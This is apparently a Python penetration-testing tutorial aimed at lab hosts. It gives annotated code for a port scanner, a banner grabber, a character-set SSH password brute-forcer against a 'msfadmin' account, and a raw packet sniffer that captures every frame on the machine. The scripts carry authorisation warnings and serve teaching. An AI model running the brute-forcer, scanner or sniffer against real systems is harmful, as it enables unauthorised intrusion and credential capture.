Keep the Python `socket` module documentation open while working through these examples, so you can check the purpose and exact signature of each function used (for example, `connect()` and `connect_ex()` take a single `(host, port)` tuple).

1. Create a Socket connection

import socket

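def main():
    """Attempt a TCP connection to localhost:5000 and report the result.

    connect_ex() returns 0 on success and the errno of the failure otherwise
    (e.g. ECONNREFUSED when nothing is listening) instead of raising.
    """
    host = 'localhost'
    port = 5000  # must be an int; a string port makes connect_ex() raise TypeError
    with socket.socket(socket.AF_INET, socket.SOCK_STREAM) as s:
        s.settimeout(3)  # a filtered (dropped) port would otherwise block for the OS default
        # The address is ONE (host, port) tuple, not two positional arguments.
        result = s.connect_ex((host, port))
    print('Result is {}'.format(result))
    if result == 0:
        print('it works')
    else:
        print('connection failed (errno {})'.format(result))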

if __name__ == "__main__":  # run only when executed as a script, not when imported
    main()

2. Create a port scanner

import socket
from utils import timefunc

#Build a class so the scanning logic can be reused from several functions.
#In Python a function is itself an object; a class declares how to build objects (instances).
#Classes are useful because they encapsulate related state (the target, the results) and behaviour.
#[self] is the instance being operated on: self.x reads/writes its attributes, self.f() calls its methods.

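class Scanner:
    """Sequential TCP connect scanner for a single IP address.

    Only scan hosts you are authorised to test: a connect scan completes the
    TCP handshake, so it shows up in the target's logs and in most IDS sensors.
    """

    def __init__(self, ip, timeout=1.0):
        self.ip = ip
        # Seconds to wait per port. Without a timeout a filtered (dropped)
        # port blocks connect_ex() for the OS default, often over a minute.
        self.timeout = timeout
        self.open_ports = []

    def __repr__(self):
        return 'Scanner: {}'.format(self.ip)

    def scan(self, lowerport, upperport):
        """Probe every port in [lowerport, upperport] and record the open ones."""
        for port in range(lowerport, upperport + 1):
            if self.is_open(port):
                self.add_port(port)

    def add_port(self, port):
        """Record an open port. scan() called this but it was never defined."""
        self.open_ports.append(port)

    def is_open(self, port):
        """Return True if a TCP connection to (ip, port) is accepted.

        connect_ex() takes ONE (host, port) tuple and returns 0 on success or
        an errno instead of raising; the with-block closes the socket even if
        an exception does escape.
        """
        with socket.socket(socket.AF_INET, socket.SOCK_STREAM) as s:
            s.settimeout(self.timeout)
            result = s.connect_ex((self.ip, port))
        return result == 0

    def write(self, filepath):
        """Write the open ports, one per line, to filepath (overwriting it)."""
        with open(filepath, 'w') as f:
            f.write('\n'.join(map(str, self.open_ports)))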
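@timefunc
def main():
    """Scan the lab host for open TCP ports 1-100 and save them to ./open_ports."""
    ip = '10.0.10.140'  # lab target; only scan hosts you are authorised to test
    scanner = Scanner(ip)
    # Widen the range (e.g. 1-6000) as needed; every port costs one TCP connect.
    scanner.scan(1, 100)
    scanner.write('./open_ports')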

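if __name__ == '__main__':  # was a single '=' (assignment) -> SyntaxError
    main()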

4. Banner reading from open ports

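class Grabber:
    """Connect to ip:port and read whatever the service sends first (its banner).

    The connection is opened in __init__, so construction itself can raise
    OSError (refused, unreachable, timed out); callers must handle that.
    """

    def __init__(self, ip, port, timeout=5.0):
        self.ip = ip
        self.port = port
        self.socket = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
        # Seconds to wait for connect() and for each recv(). A service that
        # waits for the client to speak first (HTTP, for example) never sends
        # a banner, so read() would otherwise block; the original 1000 s was
        # effectively forever.
        self.socket.settimeout(timeout)
        try:
            # connect() takes ONE (host, port) tuple, not two arguments.
            self.socket.connect((self.ip, self.port))
        except OSError:
            self.socket.close()  # don't leak the descriptor when construction fails
            raise

    def read(self, length=1024):
        """Return up to `length` bytes sent by the service (b'' if it closed).

        Raises socket.timeout if nothing arrives within the timeout.
        """
        return self.socket.recv(length)

    def close(self):
        self.socket.close()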


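def main():
    """Print the banner of the SSH service on the lab host 10.0.13.231:22."""
    grabber = Grabber('10.0.13.231', 22)
    try:
        print(grabber.read())
    finally:
        grabber.close()  # release the socket even if recv() times out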



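if __name__ == '__main__':  # was a single '=' (assignment) -> SyntaxError
    main()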

5. Combine the two previous classes

from utils import timefunc
from port_scanner import Scanner
from grabber import Grabber

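@timefunc
def main():
    """Scan ports 1-1001 on the lab host and print the banner of each open one."""
    ip = '10.0.13.231'
    portrange = (1, 1001)  # was spelled two different ways -> NameError
    scanner = Scanner(ip)
    scanner.scan(*portrange)
    for port in scanner.open_ports:
        # Best effort: a service that sends no banner times out, and a port
        # can close between the scan and the grab. Report it and move on.
        try:
            grabber = Grabber(ip, port)
        except OSError as e:
            print("Error", port, e)
            continue
        try:
            print(port, grabber.read())
        except OSError as e:
            print("Error", port, e)
        finally:
            grabber.close()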

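if __name__ == '__main__':  # was a single '=' (assignment) -> SyntaxError
    main()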

6. Brute forcing an SSH connection

Only run this against systems you are explicitly authorised to test: every attempt is a full SSH login that the target logs, and repeated failures commonly trigger account lockout or fail2ban-style IP bans.

import itertools as it
import string
from utils import timefunc

import paramiko

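def create_client(ip=None, username=None, password=None):
    """Return a paramiko SSHClient ready for connect().

    ip, username and password are accepted for call-site compatibility but not
    used here: the caller passes them to client.connect(). They default to None
    so the bare create_client() call in Brutes.crackit no longer raises TypeError.

    SECURITY: AutoAddPolicy accepts whatever host key the server presents, so a
    man-in-the-middle between you and the target can capture every password
    tried. Tolerable only on an isolated lab network; otherwise load known_hosts
    (client.load_system_host_keys()) and use paramiko.RejectPolicy.
    """
    client = paramiko.SSHClient()
    client.set_missing_host_key_policy(paramiko.AutoAddPolicy())
    return client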


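class Brutes:
    """Exhaustive password search against one SSH account.

    Use only against systems you are authorised to test. Each guess is a full
    SSH login attempt: it is logged, and repeated failures commonly trigger
    account lockout or fail2ban-style IP bans.
    """

    def __init__(self, charset, length, ip):
        self.charset = charset
        self.length = length  # exact password length tried: len(charset) ** length guesses
        self.ip = ip

    @timefunc
    def crackit(self, username):
        """Try every guess for username; return the password found, else None."""
        for guess in self.guesses:
            client = create_client(self.ip, username, guess)
            try:
                # Per the paramiko docs, timeout covers the TCP connect only.
                client.connect(self.ip, username=username, password=guess, timeout=0.5)
                print('the password is {}'.format(guess))
                return guess
            except paramiko.AuthenticationException:
                # Was 'authenticationException' -> AttributeError on the first wrong guess.
                print('{} is not it'.format(guess))
            except (paramiko.SSHException, OSError) as e:
                # Transport-level failure (reset, timeout, server hit MaxAuthTries):
                # this guess was NOT evaluated, so skipping it risks a false
                # negative. A real tool would retry with backoff here.
                print('{} could not be tried: {}'.format(guess, e))
            finally:
                client.close()
        return None

    @property
    def guesses(self):
        """Yield every string of exactly self.length characters drawn from charset."""
        for combo in it.product(self.charset, repeat=self.length):
            yield ''.join(combo)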

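@timefunc
def main():
    """Brute-force the msfadmin account on the lab host with 4-character passwords.

    The decorator was indented into the class body above, which is a SyntaxError;
    it belongs at column 0 with the function it decorates.
    """
    # Keep the charset small: guesses = len(charset) ** length, each a full SSH
    # login. 'aspeb' ** 4 is 625 attempts; string.ascii_lowercase ** 4 is ~457k.
    charset = 'aspeb'
    # NOTE(review): earlier sections target 10.0.13.231 -- confirm this address.
    ip = '10.1.13.231'
    brute = Brutes(charset, 4, ip)
    password = brute.crackit(username='msfadmin')
    if password:
        print('found {}'.format(password))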


if __name__ == "__main__":  # run only when executed as a script, not when imported
    main()

7. Packet sniffing in python

Note: this example assumes you are on Linux (AF_PACKET sockets are Linux-only) and running as root or with CAP_NET_RAW, which opening a raw socket requires.

import socket

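def main():
    """Print every raw Ethernet frame seen on any interface until Ctrl-C.

    Needs Linux (AF_PACKET) and root or CAP_NET_RAW. The frames include the
    payload of every connection on the box, credentials included, so don't
    leave this running or redirect its output anywhere unattended.
    """
    ETH_P_ALL = 0x0003  # the bare 3 in the original is this constant: "all protocols"
    with socket.socket(socket.AF_PACKET, socket.SOCK_RAW, socket.ntohs(ETH_P_ALL)) as conn:
        try:
            while True:
                raw_data, _addr = conn.recvfrom(65500)  # larger than any Ethernet frame
                print(raw_data)
        except KeyboardInterrupt:
            print('stopped')  # Ctrl-C is the only way out of the loop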

if __name__ == "__main__":  # run only when executed as a script, not when imported
    main()

Note: while the sniffer is running, ping a remote host from another terminal and watch the raw frames being printed to the screen.
